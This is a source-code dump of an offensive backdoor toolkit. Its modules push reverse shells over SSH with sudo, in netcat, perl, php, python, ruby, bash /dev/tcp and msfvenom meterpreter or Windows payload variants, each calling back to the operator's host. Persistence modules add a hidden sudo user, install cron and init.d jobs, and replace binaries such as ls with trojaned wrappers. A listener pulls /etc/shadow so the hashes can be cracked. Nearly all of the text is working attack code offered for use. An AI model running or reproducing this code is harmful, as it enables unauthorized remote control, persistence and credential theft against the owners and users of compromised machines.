% payload) 40 | print("> set LHOST %s" % self.core.localIP) 41 | print("> exploit") 42 | input(GOOD + "Press any key to launch exploit once msfconsole is listening...") 43 | target.ssh.exec_command(self.get_command()) 44 | for mod in self.modules.keys(): 45 | print(INFO + "Attempting to execute " + mod.name + " module...") 46 | mod.exploit() 47 | 48 | -------------------------------------------------------------------------------- /backdoors/shell/netcat.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import time 3 | 4 | class Netcat(Backdoor): 5 | prompt = Fore.RED + "(nc) " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using netcat backdoor..." 10 | self.core = core 11 | self.options = { 12 | "port" : Option("port", 53920, "port to connect to", True), 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = INFO + "Uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell." 17 | 18 | def get_command(self): 19 | #command = "echo " + self.core.curtarget.pword + " | sudo -S bash -c \"cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f\"" % self.get_value("port") 20 | command = "cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f" % self.get_value("port") 21 | return command 22 | 23 | def do_exploit(self, args): 24 | port = self.get_value("port") 25 | target = self.core.curtarget 26 | self.listen(prompt="some") 27 | #input("Enter the following command in another terminal: nc -v -n -l -p %s" % port) 28 | print(GOOD + "Initializing backdoor...") 29 | target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /tmp/f") 30 | time.sleep(.5) 31 | target.ssh.exec_command("mkfifo /tmp/f") 32 | #target.ssh.exec_command("echo " + target.pword + " | sudo -S chmod 222 /tmp/f") 33 | target.ssh.exec_command(self.get_command()) 34 | print(GOOD + "Netcat backdoor on port %s attempted." % port) 35 | for mod in self.modules.keys(): 36 | print(INFO + "Attempting to execute " + mod.name + " module...") 37 | mod.exploit() 38 | 39 | -------------------------------------------------------------------------------- /backdoors/shell/netcat_traditional.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Netcat_Traditional(Backdoor): 4 | prompt = Fore.RED + "(nct) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using netcat-traditional module" 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53926, "port to connect to", True), 12 | } 13 | self.modules = {} 14 | self.allow_modules = True 15 | self.help_text = INFO + "Utilizes netcat's traditional -e option to create a reverse shell." 16 | 17 | def get_command(self): 18 | return "echo " + self.core.curtarget.pword + " | sudo -S nc.traditional -l -p %s -e /bin/bash" % self.get_value("port") 19 | 20 | def do_exploit(self, args): 21 | target = self.core.curtarget 22 | port = self.get_value("port") 23 | print(INFO + "Shipping netcat-traditional package.") 24 | target.scpFiles(self, '/bin/nc.traditional', False) 25 | print(GOOD + "Initializing backdoor on port %s..." % port) 26 | target.ssh.exec_command(self.get_command()) 27 | print(GOOD + "Backdoor attempted. Use nc " + target.hostname + " %s." % port) 28 | for mod in self.modules.keys(): 29 | print(INFO + "Attempting to execute " + mod.name + " module...") 30 | mod.exploit() 31 | -------------------------------------------------------------------------------- /backdoors/shell/perl.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Perl(Backdoor): 4 | prompt = Fore.RED + "(perl) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Perl module" 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53921, "port to connect to", True), 12 | "name" : Option("name", "apache", "name of the backdoor", True), 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = INFO + "A script written in perl which listens on the network and redirects its input to bash, and renames its process to look less conspicuous." 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S perl -e \"use Socket;\" -e \"socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\" -e \"connect(SOCK, sockaddr_in(" + str(self.get_value("port")) + ",inet_aton('" + self.core.localIP + "')));\" -e \"open(STDIN, '>&SOCK');\" -e \"open(STDOUT,'>&SOCK');\" -e \"open(STDERR,'>&SOCK');\" -e \"exec({'/bin/sh'} ('" + self.get_value("name") + "', '-i'));\"" 20 | 21 | def do_exploit(self, args): 22 | self.listen("none", "none") 23 | self.core.curtarget.ssh.exec_command(self.get_command()) 24 | print("Perl backdoor on port %s attempted. " % self.get_value("port")) 25 | 26 | for mod in self.modules.keys(): 27 | print(INFO + "Attempting to execute " + mod.name + " module...") 28 | mod.exploit() 29 | -------------------------------------------------------------------------------- /backdoors/shell/php.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Php(Backdoor): 4 | prompt = Fore.RED + "(php) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using php module..." 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53930, "port to connect to", True), 12 | } 13 | self.allow_modules = True 14 | self.modules = {} 15 | self.help_text = INFO + "Creates and runs a php backdoor which sends output to bash.\n"+INFO+"It does not automatically install a web server, but instead uses the php web module." 16 | 17 | def get_command(self): 18 | return "echo " + self.core.curtarget.pword + " | sudo -S php -r '$sock=fsockopen(\"" + self.core.localIP + "\"," + str(self.get_value("port")) + ");exec(\"/bin/sh -i <&3 >&3 2>&3\");'" 19 | 20 | def do_exploit(self, args): 21 | port = self.get_value("port") 22 | target = self.core.curtarget 23 | #input("Please enter the following command: nc -v -n -l -p %s in another shell to connect." % port) 24 | self.listen("none", "none") 25 | print(GOOD + "Initializing backdoor...") 26 | target.ssh.exec_command(self.get_command()) 27 | for mod in self.modules.keys(): 28 | print(INFO + "Attempting to execute " + mod.name + " module...") 29 | mod.exploit(self.get_command()) 30 | # for mod in self.portModules.keys(): 31 | # print(INFO + "Attempting to execute " + mod.name + " module...") 32 | # mod.exploit(self.get_port()) 33 | 34 | -------------------------------------------------------------------------------- /backdoors/shell/pyth.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Pyth(Backdoor): 4 | prompt = Fore.RED + "(py) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Python module..." 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53922, "port to connect to", True), 12 | } 13 | self.modules = {} 14 | self.allow_modules = True 15 | self.help_text = INFO + "Uses a short python script to listen for commands and send output back to the user." 16 | 17 | def get_command(self): 18 | command = "echo " + self.core.curtarget.pword + " | sudo -S python -c \"import socket, subprocess, os; \ 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); \ 20 | s.connect(('" + self.core.localIP + "', " + str(self.get_value("port")) + ")); \ 21 | os.dup2(s.fileno(),0); \ 22 | os.dup2(s.fileno(),1); \ 23 | os.dup2(s.fileno(),2); \ 24 | subprocess.call(['/bin/bash', '-i'])\" " 25 | #print(command) 26 | return command 27 | 28 | def do_exploit(self, args): 29 | self.listen() 30 | self.core.curtarget.ssh.exec_command(self.get_command()) 31 | print(GOOD + "Python backdoor on %s attempted." % self.get_value("port")) 32 | for mod in self.modules.keys(): 33 | print(INFO + "Attempting to execute " + mod.name + " module...") 34 | mod.exploit() -------------------------------------------------------------------------------- /backdoors/shell/ruby.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import time 3 | 4 | class Ruby(Backdoor): 5 | prompt = Fore.RED + "(rb) " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using Ruby module..." 10 | self.core = core 11 | self.options = { 12 | "port" : Option("port", 53937, "port to connect to", True), 13 | } 14 | self.modules = {} 15 | self.allow_modules = True 16 | self.help_text = INFO + "Uses ruby to open a socket and redirect I/O to /bin/sh." 17 | 18 | def get_command(self): 19 | command = "echo " + self.core.curtarget.pword + " | sudo -S ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"" + self.core.localIP + "\",\"" + str(self.get_value("port")) + "\");while(cmd=c.gets);IO.popen(cmd,\"r\"){ |io| c.print io.read } end'" 20 | print(command) 21 | return command 22 | 23 | def do_exploit(self, args): 24 | print(GOOD + "Initializing backdoor...") 25 | self.listen(prompt="none") 26 | self.core.curtarget.ssh.exec_command(self.get_command()) 27 | print(GOOD + "Ruby backdoor on " + str(self.get_value("port")) + " attempted.") 28 | 29 | for mod in self.modules.keys(): 30 | print(INFO + "Attempting to execute " + mod.name + " module...") 31 | mod.exploit() -------------------------------------------------------------------------------- /backdoors/shell/sh.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Bash(Backdoor): 4 | prompt = Fore.RED + "(sh) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Sh backdoor..." 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53935, "port to connect to", True), 12 | } 13 | 14 | self.modules = {} 15 | self.allow_modules = True 16 | self.help_text = INFO + "Uses a simple sh command to connect to a specific ip and port combination, and pipes its input into a sh shell." 17 | 18 | def get_command(self): 19 | return "sudo -S nohup sh -i >& /dev/tcp/" + self.core.localIP + "/%s 0>&1" % self.get_value("port") 20 | 21 | def do_exploit(self, args): 22 | port = self.get_value("port") 23 | target = self.core.curtarget 24 | print(GOOD + "Initializing backdoor...") 25 | self.listen(target.pword, "none") 26 | target.ssh.exec_command(self.get_command()) 27 | print(GOOD + "Sh Backdoor on port " + str(port) + " attempted.") 28 | for mod in self.modules.keys(): 29 | print(INFO + "Attempting to execute " + mod.name + " module...") 30 | mod.exploit() -------------------------------------------------------------------------------- /backdoors/shell/sh2.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import subprocess 3 | import threading 4 | 5 | class Bash2(Backdoor): 6 | prompt = Fore.RED + "(sh2) " + Fore.BLUE + ">> " + Fore.RESET 7 | 8 | def __init__(self, core): 9 | cmd.Cmd.__init__(self) 10 | self.intro = GOOD + "Using second Sh module..." 11 | self.core = core 12 | self.options = { 13 | "port" : Option("port", 53936, "port to connect to", True), 14 | } 15 | self.allow_modules = True 16 | self.modules = {} 17 | self.help_text = INFO + "A slightly different version of the other sh backdoor." 18 | 19 | def get_command(self): 20 | #return "echo " + self.core.curtarget.pword + " | sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; bash <&196 >&196 2>&196" % self.get_value("port") 21 | return "sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; sudo -S sh <&196 >&196 2>&196" % self.get_value("port") 22 | 23 | def do_exploit(self, args): 24 | port = self.get_value("port") 25 | target = self.core.curtarget 26 | print(GOOD + "Initializing backdoor...") 27 | self.listen(target.pword, "none") 28 | target.ssh.exec_command(self.get_command()) 29 | 30 | for mod in self.modules.keys(): 31 | print(INFO + "Attempting to execute " + mod.name + " module...") 32 | mod.exploit() 33 | -------------------------------------------------------------------------------- /backdoors/shell/web.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Web(Backdoor): 4 | prompt = Fore.RED + "(web) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Web module" 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53929, "port to connect to", True), 12 | "name" : Option("name", "backdoor.php", "name of backdoor", True), 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = INFO + "Ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor." 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S php /var/www/html/" + self.get_value("name") 20 | 21 | def do_exploit(self, args): 22 | port = self.get_value("port") 23 | name = self.get_value("name") 24 | target = self.core.curtarget 25 | target.scpFiles(self, "backdoors/auxiliary/web/install.sh", False) 26 | target.ssh.exec_command("echo " + target.pword + " | sudo -S bash install.sh") 27 | print(GOOD + "Starting Apache server on target...") 28 | os.system("msfvenom -p php/meterpreter_reverse_tcp LHOST=" + self.core.localIP + " LPORT=" + str(port) + " -f raw > " + name) 29 | print(GOOD + "Creating backdoor...") 30 | target.scpFiles(self, name, False) 31 | print(GOOD + "Shipping backdoor...") 32 | target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /var/www/html/" + name) 33 | target.ssh.exec_command("echo " + target.pword + " | sudo -S mv " + name + " /var/www/html") 34 | print("Start a handler with metasploit using the following commands: ") 35 | print("> use exploit/multi/handler") 36 | print("> set PAYLOAD php/meterpreter_reverse_tcp") 37 | print("> set LHOST " + self.core.localIP) 38 | print("> set LPORT " + str(port)) 39 | print("> exploit\n") 40 | print("Then visit the site at " + target.hostname + "/" + name) 41 | print("To begin your session, type sessions -i [session id]") 42 | for mod in self.modules.keys(): 43 | print(INFO + "Attempting to execute " + mod.name + " module...") 44 | mod.exploit() 45 | 46 | -------------------------------------------------------------------------------- /backdoors/shell/x86.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | 4 | class x86(Backdoor): 5 | prompt = Fore.RED + "x86 " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using x86 module..." 10 | self.core = core 11 | self.options = { 12 | "port": Option("port", 53935, "port to connect to", True), 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = "A binary that should run on many x86 platforms allowing for a reverse tcp shell" 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S nohup ./x86 " + self.core.localIP + " " + str(self.get_value("port")) 20 | 21 | def do_exploit(self, args): 22 | #input("Run the following command: nc -vnlp %s in another shell" % str(self.get_value("port"))) 23 | self.listen("none", "none") 24 | target = self.core.curtarget 25 | port = self.get_value("port") 26 | target.ssh.exec_command('rm x86') 27 | target.scpFiles(self, 'backdoors/shell/__x86/x86', False) 28 | print(GOOD + "Moving the backdoor program") 29 | target.ssh.exec_command(self.get_command()) 30 | print(GOOD + "x86 backdoor on %s attempted." % port) 31 | for mod in self.modules.keys(): 32 | print(INFO + "Attempting to execute " + mod.name + " module...") 33 | mod.exploit() 34 | -------------------------------------------------------------------------------- /backdoors/template.py: -------------------------------------------------------------------------------- 1 | #This is the template to create backdoors. Please copy your backdoor into the suggested spots. Places you need to input are shown by ~tildes~. 2 | from .backdoor import * 3 | #Remember extra imports. 4 | 5 | class ~NAME~(Backdoor): 6 | prompt = Fore.RED + "~NAME~" + Fore.BLUE + ">> " + Fore.RESET 7 | 8 | def __init__(self, core): 9 | cmd.Cmd.__init__(self) 10 | self.intro = GOOD + "Using ~NAME~ module..." 11 | self.core = core 12 | self.options = { #~Input extra options. You almost always need a port.~ 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = "" 17 | 18 | def get_command(self): 19 | #~Add the final command.~ 20 | pass 21 | 22 | def do_exploit(self, args): 23 | #~Add all commands needed to run the program.~ 24 | pass 25 | 26 | #After you have filled out this entire program, move it to the correct folder. 27 | -------------------------------------------------------------------------------- /backdoors/windows/windows.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import os 3 | 4 | 5 | class Windows(Backdoor): 6 | prompt = Fore.RED + "(windows) " + Fore.BLUE + ">> " + Fore.RESET 7 | 8 | def __init__(self, core): 9 | cmd.Cmd.__init__(self) 10 | self.intro = GOOD + "Using Windows module..." 11 | self.core = core 12 | self.options = { 13 | "port": Option("port", 53932, "port to connect to", True), 14 | "name": Option("name", "back.exe", "name of new backdoor", True), 15 | } 16 | self.allow_modules = True 17 | self.modules = {} 18 | self.help_text = INFO + " Creates and starts a metasploit reverse_tcp backdoor." 19 | 20 | def get_command(self): 21 | return self.get_value("name") 22 | 23 | def do_exploit(self, args): 24 | os.system("msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=" + self.core.localIP + " LPORT=" + str(self.get_value("port")) + " -b \"\\x00\" -e x86/shikata_ga_nai -f exe -o " + self.get_value("name")) 25 | print(GOOD + "Making the backdoor.") 26 | self.core.curtarget.scpFiles(self, self.get_value("name"), False) 27 | print(GOOD + "Moving the backdoor.") 28 | print("Please enter the following commands: ") 29 | print("msfconsole") 30 | print("use exploit/multi/handler") 31 | print("set payload windows/shell/reverse_tcp") 32 | print("set LPORT " + str(self.get_value("port"))) 33 | print("set LHOST " + str(self.core.localIP)) 34 | input("exploit") 35 | self.core.curtarget.ssh.exec_command(str(self.get_command)) 36 | for mod in self.modules.keys(): 37 | print(INFO + "Attempting to execute " + mod.name + " module...") 38 | mod.exploit() 39 | -------------------------------------------------------------------------------- /dependencies.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | if __name__ == "__main__": 4 | if os.getuid() != 0: 5 | print("Please run this installation script as root!") 6 | else: 7 | print("Installing Pip for Python.") 8 | os.system('apt-get install -y python3-pip >> /dev/null') 9 | os.system('apt-get install -y python-pip >> /dev/null') 10 | os.system("pip install --upgrade pip") 11 | print("Installing development Python version.") 12 | os.system('apt-get install -y build-essential libssl-dev libffi-dev python-dev >> /dev/null') 13 | print("Installing Nmap.") 14 | os.system('apt-get install -y nmap >> /dev/null') 15 | os.system('apt-get install -y python-tk >> /dev/null') 16 | print("Installing essential python packages.") 17 | os.system('pip install -r requirements.txt >> /dev/null') 18 | #print("Downloading additional backdoors.") 19 | #os.system('git clone https://github.com/n1nj4sec/pupy >> /dev/null') 20 | -------------------------------------------------------------------------------- /listen.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | import sys 4 | import os 5 | import cmd 6 | import pexpect 7 | 8 | #First argument - port 9 | #Second argument - password 10 | #third - if it has a prompt or not, defaults to some (meaning it has a prompt) 11 | 12 | class Interpreter(cmd.Cmd): 13 | def __init__(self): 14 | cmd.Cmd.__init__(self) 15 | self.prompt = " ### " 16 | self.bind() 17 | self.initLines = "" 18 | if sys.argv[2] == "none": 19 | if(sys.argv[3] == "some"): 20 | self.initLines = self.sock[0].recv(0x10000) # the lines given from the beginning 21 | else: #The second argument is a password; if the program requires a password. 22 | if(sys.argv[3] == "some"): 23 | self.initLines = self.sock[0].recv(0x10000) 24 | self.sock[0].send(sys.argv[2] + '\n') 25 | time.sleep(.25) 26 | self.initLines += self.sock[0].recv(0x10000) 27 | else: 28 | self.sock[0].send(sys.argv[2] + '\n') 29 | time.sleep(.25) 30 | self.initLines += self.sock[0].recv(0x10000) 31 | print("Connection Received.") 32 | 33 | def bind(self): #set up a connection 34 | self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | self.port = sys.argv[1] 36 | self.s.bind(("0.0.0.0", int(self.port))) 37 | self.s.listen(5) 38 | self.sock = self.s.accept() 39 | time.sleep(.25) 40 | 41 | def cmdloop(self): 42 | try: 43 | cmd.Cmd.cmdloop(self) 44 | except KeyboardInterrupt: 45 | print("\n" + "Disconnect your shell using Ctrl+]") 46 | self.cmdloop() 47 | #call this to print, but not include lines that were there in initialization 48 | def specialPrint(self, lines): 49 | lines = lines.split('\n')[:-1] #remove last line, the prompt 50 | if(sys.argv[3] == "some"): 51 | lines = lines[1:]#remove first line, which is our command 52 | for line in lines: 53 | print(line) 54 | 55 | def do_root(self): #to get root in case we haven't gotten it yet, just will run a few commands using the password given. 56 | pass 57 | 58 | #override 59 | def emptyline(self): 60 | pass 61 | 62 | def do_crack_passwords(self, args): 63 | self.sock[0].send("cat /etc/shadow\n") 64 | time.sleep(.25) 65 | crackString = self.sock[0].recv(0x10000) 66 | tfile = open("passwords.txt", "w") 67 | tfile.write(crackString) 68 | tfile.close() 69 | print("Type \'john --show passwords.txt\' in a new terminal in the backdoorme directory.") 70 | #override 71 | def default(self, line): 72 | try: 73 | self.sock[0].send(line + '\n') 74 | time.sleep(.25) #fix this to make it dynamic 75 | self.specialPrint(self.sock[0].recv(0x10000)) 76 | except Exception as e: 77 | print(e.__class__, ":", e) 78 | 79 | def main(): 80 | Interpreter().cmdloop() 81 | 82 | if __name__ == "__main__": 83 | main() 84 | -------------------------------------------------------------------------------- /modules/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | from os.path import dirname, basename, isfile 3 | import glob 4 | modules = glob.glob(dirname(__file__)+"/*.py") 5 | __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] 6 | ''' 7 | from .poison import * 8 | from .cron import * 9 | from .webMod import * 10 | from .whitelist import * 11 | from .addUser import * 12 | from .startup import * 13 | 14 | 15 | enabled_modules = {"adduser" : AddUser, "startup" : Startup, "poison" : Poison, "cron" : Cron, "web": WebMod, "whitelist" : Whitelist} 16 | -------------------------------------------------------------------------------- /modules/addUser.py: -------------------------------------------------------------------------------- 1 | from .module import * 2 | 3 | class AddUser(Module): 4 | 5 | def __init__(self, target, backdoor, core): 6 | self.target = target 7 | self.core = core 8 | self.name = "AddUser" 9 | self.backdoor = backdoor 10 | self.options = { 11 | "username": Option("username", "bob1234", "name of new user", False), 12 | "password": Option("password", "password", "password of new user", False), 13 | } 14 | 15 | def exploit(self): 16 | user = self.get_value("username") 17 | password = self.get_value("password") 18 | print(GOOD + "Creating user...") 19 | 20 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S useradd -M -p $(openssl passwd -1 \"" + password + "\") " + user) 21 | 22 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S usermod -a -G sudo " + user) 23 | 24 | print(GOOD + " " + self.name + " module success") 25 | -------------------------------------------------------------------------------- /modules/cron.py: -------------------------------------------------------------------------------- 1 | from .module import * 2 | 3 | class Cron(Module): 4 | 5 | def __init__(self, target, backdoor, core): 6 | self.core = core 7 | self.target = target 8 | self.name = "Cron" 9 | self.backdoor = backdoor 10 | self.options = { 11 | "frequency": Option("frequency", "* * * * *", "how often to run command", False), 12 | } 13 | 14 | def exploit(self): 15 | frequency = self.get_value("frequency") 16 | self.target.ssh.exec_command("echo \"SHELL=/bin/bash\" > mycron") 17 | self.target.ssh.exec_command("crontab -l >> mycron") 18 | self.target.ssh.exec_command("echo \"" + frequency + " " + self.backdoor.get_command() + "\" >> mycron && crontab mycron && rm mycron") 19 | print(GOOD + self.name + " module success") 20 | -------------------------------------------------------------------------------- /modules/module.py: -------------------------------------------------------------------------------- 1 | import cmd 2 | import os 3 | from colorama import * 4 | from .option import * 5 | 6 | GOOD = Fore.GREEN + " + " + Fore.RESET 7 | BAD = Fore.RED + " - " + Fore.RESET 8 | WARN = Fore.YELLOW + " * " + Fore.RESET 9 | INFO = Fore.BLUE + " + " + Fore.RESET 10 | 11 | class Module(object): 12 | def __init__(self, core): 13 | self.options = {} 14 | self.core = core 15 | 16 | def set_option(self, option, value): 17 | if option in self.options.keys(): 18 | self.options[option] = value 19 | return True 20 | else: 21 | return False 22 | 23 | def get_value(self, name): 24 | if name in self.options: 25 | return self.options[name].value 26 | else: 27 | return None 28 | 29 | def help(self, args): 30 | for name, opt in self.options.items(): 31 | print("%s\t\t%s\t\t%s\t\t%s" % (opt.name, opt.value, opt.description, opt.required)) 32 | -------------------------------------------------------------------------------- /modules/option.py: -------------------------------------------------------------------------------- 1 | class Option(object): 2 | def __init__(self, name, value, description, required): 3 | self.name = name 4 | self.value = value 5 | self.description = description 6 | self.required = required 7 | -------------------------------------------------------------------------------- /modules/poison.py: -------------------------------------------------------------------------------- 1 | from .module import * 2 | import tempfile 3 | 4 | class Poison(Module): 5 | def __init__(self, target, backdoor, core): 6 | self.core = core 7 | self.target = target 8 | self.name = "Poison" 9 | self.backdoor = backdoor 10 | self.options = { 11 | "name" : Option("name", "ls", "name of command to poison", False), 12 | "location" : Option("location", "/bin", "where to put poisoned files into", False) 13 | } 14 | 15 | def exploit(self): 16 | name = self.get_value("name") 17 | loc = self.get_value("location") 18 | password = self.target.pword 19 | tmp_dir = tempfile.mkdtemp() 20 | poison = open(tmp_dir + "/" + name, "w") 21 | poison.write("#!/bin/bash\n( %s & ) > /dev/null 2>&1 && %s/share/%s $@" % (self.backdoor.get_command(), loc, name)) # bash poison 22 | # C Poison: #include \nint main() {\nsystem("./initd 2> /dev/null &");\n system("/bin/share/ls");\n return 0; 23 | poison.close() 24 | self.target.scpFiles(self, tmp_dir + "/" + name, False) 25 | self.target.ssh.exec_command("echo %s | sudo -S mkdir %s/share" % (password, loc)) # create folder 26 | self.target.ssh.exec_command("echo %s | sudo -S mv %s/%s %s/share/" % (password, loc, name, loc)) #move old binary to folder 27 | self.target.ssh.exec_command("echo %s | sudo -S cp %s %s/" % (password, name, loc)) #move new binary to old location 28 | self.target.ssh.exec_command("echo %s | sudo -S chmod +x %s/%s" % (password, loc, name)) 29 | print(GOOD + self.name + " module success") 30 | 31 | 32 | -------------------------------------------------------------------------------- /modules/startup.py: -------------------------------------------------------------------------------- 1 | from .module import * 2 | 3 | class Startup(Module): 4 | 5 | def __init__(self, target, backdoor, core): 6 | self.core = core 7 | self.target = target 8 | self.name = "startup" 9 | self.backdoor = backdoor 10 | self.options = { 11 | } 12 | 13 | def exploit(self): 14 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S echo \'" + self.backdoor.get_command() + "\' > file1234.sh") 15 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S chmod +x file1234.sh") 16 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S mv file1234.sh /etc/init.d/") 17 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S update-rc.d file1234.sh defaults") 18 | print(GOOD + self.name + " module success") 19 | -------------------------------------------------------------------------------- /modules/template.py: -------------------------------------------------------------------------------- 1 | #This is a template for your use to add additional modules. Modules are used to make a backdoor more potent, stealthy, or dangerous, but feel free to add anything you think might help! Places you need to input are designated by ~tildes~. 2 | from .module import * 3 | 4 | class ~NAME~(Module): 5 | def __init__(self, target, command, core): 6 | self.core = core 7 | self.target = target 8 | self.name = "~NAME~" 9 | self.command = command 10 | self.options = { #~Add options to make your module more potent.~ 11 | } 12 | 13 | def exploit(self): 14 | #~ADD YOUR INSTRUCTIONS HERE. If you need th command, it is self.backdoor.get_command().~ 15 | print(GOOD + self.name + " module success") 16 | 17 | #Please add this to the backdoorme/modules/__init__.py file following the established convention. 18 | -------------------------------------------------------------------------------- /modules/web/env1: -------------------------------------------------------------------------------- 1 | # envvars - default environment variables for apache2ctl 2 | 3 | # this won't be correct after changing uid 4 | unset HOME 5 | 6 | # for supporting multiple apache2 instances 7 | if [ "${APACHE_CONFDIR##/etc/apache2-}" != "${APACHE_CONFDIR}" ] ; then 8 | SUFFIX="-${APACHE_CONFDIR##/etc/apache2-}" 9 | else 10 | SUFFIX= 11 | fi 12 | 13 | # Since there is no sane way to get the parsed apache2 config in scripts, some 14 | # settings are defined via environment variables and then used in apache2ctl, 15 | # /etc/init.d/apache2, /etc/logrotate.d/apache2, etc. 16 | export APACHE_RUN_USER= 17 | -------------------------------------------------------------------------------- /modules/web/env2: -------------------------------------------------------------------------------- 1 | 2 | export APACHE_RUN_GROUP=www-data 3 | # temporary state file location. This might be changed to /run in Wheezy+1 4 | export APACHE_PID_FILE=/var/run/apache2/apache2$SUFFIX.pid 5 | export APACHE_RUN_DIR=/var/run/apache2$SUFFIX 6 | export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX 7 | # Only /var/log/apache2 is handled by /etc/logrotate.d/apache2. 8 | export APACHE_LOG_DIR=/var/log/apache2$SUFFIX 9 | 10 | ## The locale used by some modules like mod_dav 11 | export LANG=C 12 | ## Uncomment the following line to use the system default locale instead: 13 | #. /etc/default/locale 14 | 15 | export LANG 16 | 17 | ## The command to get the status for 'apache2ctl status'. 18 | ## Some packages providing 'www-browser' need '--dump' instead of '-dump'. 19 | #export APACHE_LYNX='www-browser -dump' 20 | 21 | ## If you need a higher file descriptor limit, uncomment and adjust the 22 | ## following line (default is 8192): 23 | #APACHE_ULIMIT_MAX_FILES='ulimit -n 65536' 24 | 25 | ## If you would like to pass arguments to the web server, add them below 26 | ## to the APACHE_ARGUMENTS environment. 27 | #export APACHE_ARGUMENTS='' 28 | 29 | ## Enable the debug mode for maintainer scripts. 30 | ## This will produce a verbose output on package installations of web server modules and web application 31 | ## installations which interact with Apache 32 | #export APACHE2_MAINTSCRIPT_DEBUG=1 33 | 34 | -------------------------------------------------------------------------------- /modules/web/envvars: -------------------------------------------------------------------------------- 1 | # envvars - default environment variables for apache2ctl 2 | 3 | # this won't be correct after changing uid 4 | unset HOME 5 | 6 | # for supporting multiple apache2 instances 7 | if [ "${APACHE_CONFDIR##/etc/apache2-}" != "${APACHE_CONFDIR}" ] ; then 8 | SUFFIX="-${APACHE_CONFDIR##/etc/apache2-}" 9 | else 10 | SUFFIX= 11 | fi 12 | 13 | # Since there is no sane way to get the parsed apache2 config in scripts, some 14 | # settings are defined via environment variables and then used in apache2ctl, 15 | # /etc/init.d/apache2, /etc/logrotate.d/apache2, etc. 16 | export APACHE_RUN_USER=student 17 | export APACHE_RUN_GROUP=www-data 18 | # temporary state file location. This might be changed to /run in Wheezy+1 19 | export APACHE_PID_FILE=/var/run/apache2/apache2$SUFFIX.pid 20 | export APACHE_RUN_DIR=/var/run/apache2$SUFFIX 21 | export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX 22 | # Only /var/log/apache2 is handled by /etc/logrotate.d/apache2. 23 | export 